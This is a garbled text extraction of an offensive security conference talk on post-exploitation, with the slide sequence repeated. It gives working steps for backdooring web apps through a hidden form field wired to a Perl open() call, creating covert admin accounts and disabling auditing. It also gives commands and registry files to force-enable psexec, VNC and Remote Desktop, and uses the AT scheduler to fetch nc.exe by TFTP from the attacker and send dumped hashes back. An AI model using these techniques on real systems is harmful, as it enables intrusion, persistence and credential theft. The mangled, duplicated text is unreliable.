and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old
some forgotten some new
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 4
bull What is thisndash Follow up to Valrsquos and HD Moorersquos
Tactical Exploitation talk from last yearndash A talk about the use of automation
and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old
some forgotten some new
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
